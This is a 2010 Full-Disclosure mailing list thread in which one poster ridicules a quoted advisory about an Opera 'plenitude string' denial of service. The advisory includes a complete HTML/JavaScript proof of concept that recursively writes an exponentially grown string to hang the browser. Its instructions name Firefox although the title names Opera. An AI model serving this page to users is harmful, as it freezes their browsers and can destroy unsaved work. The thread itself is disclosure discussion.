[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Opera (plenitude String )Denial of Service Exploit
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Opera (plenitude String )Denial of Service Exploit
- From: Jeff Williams <jeffwillis30@xxxxxxxxx>
- Date: Wed, 3 Mar 2010 22:05:22 +1100
You get a life.
Fixed.
2010/3/3 information security <informationhacker08@xxxxxxxxx>
> Thanks .Jeff for all your comment
> so how to fix that
>
>
> On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwillis30@xxxxxxxxx>wrote:
>
>> You gotta be joking, this is probably the 3000th DoS "advisory" for
>> document.write.
>>
>> Guess what sparky, even Jeremy Brown didn't post that one.
>>
>> Thus no surprise exploit-db post this kind of shit.
>>
>>
>> 2010/3/3 information security <informationhacker08@xxxxxxxxx>
>>
>>> ======================================================================
>>>
>>>
>>> Opera (plenitude String )Denial of Service Exploit
>>>
>>> =======================================================================
>>>
>>>
>>>
>>> by
>>>
>>> Asheesh Kumar Mani Tripathi
>>>
>>>
>>> # code by Asheesh kumar Mani Tripathi
>>>
>>> # email informationhacker08@xxxxxxxxx
>>>
>>>
>>>
>>> # company www.aksitservices.co.in
>>>
>>> # Credit by Asheesh Anaconda
>>>
>>>
>>> #Download http://www.opera.com/download/
>>>
>>>
>>>
>>>
>>> #Background
>>>
>>> Opera is a popular internet browser :)
>>>
>>> #Vulnerability
>>> This bug is a typical result when attacker try to write plenitude String in
>>> document.write() function .User interaction is required to
>>>
>>>
>>>
>>> exploit this vulnerability in that the target must visit a malicious
>>> web page.
>>>
>>>
>>>
>>> #Impact
>>> Browser doesn't respond any longer to any user input, all tabs are no
>>> longer accessible, your work if any might be lost.
>>>
>>>
>>>
>>>
>>>
>>> #Proof of concept
>>> copy the code in text file and save as "asheesh.html" open in Mozilla
>>> Firefox
>>>
>>> ========================================================================================================================
>>>
>>>
>>>
>>> asheesh.html
>>> ========================================================================================================================
>>>
>>> <html>
>>>
>>>
>>>
>>> <title>asheesh kumar mani tripathi</title>
>>> Asheesh kumar Mani Tripathi
>>> <head>
>>>
>>> <script>
>>>
>>>
>>>
>>> function asheesh ()
>>> {
>>> var i , anaconda = "XXXX"
>>> for(i=24;i >0 ;--i)
>>>
>>>
>>>
>>> {
>>> anaconda=anaconda+anaconda;
>>> }
>>>
>>> document.write(anaconda);
>>>
>>> asheesh();
>>>
>>> }
>>> asheesh();
>>>
>>> </script>
>>> </head>
>>>
>>> <body onLoad="asheesh()"></body>
>>>
>>>
>>>
>>> </html>
>>>
>>>
>>>
>>> ========================================================================================================================
>>> Why do you worry without cause? Whom do you fear without reason? Who can
>>> kill you?
>>>
>>>
>>>
>>> The soul is neither born, nor does it die.
>>>
>>>
>>> #If you have any questions, comments, or concerns, feel free to contact me.
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/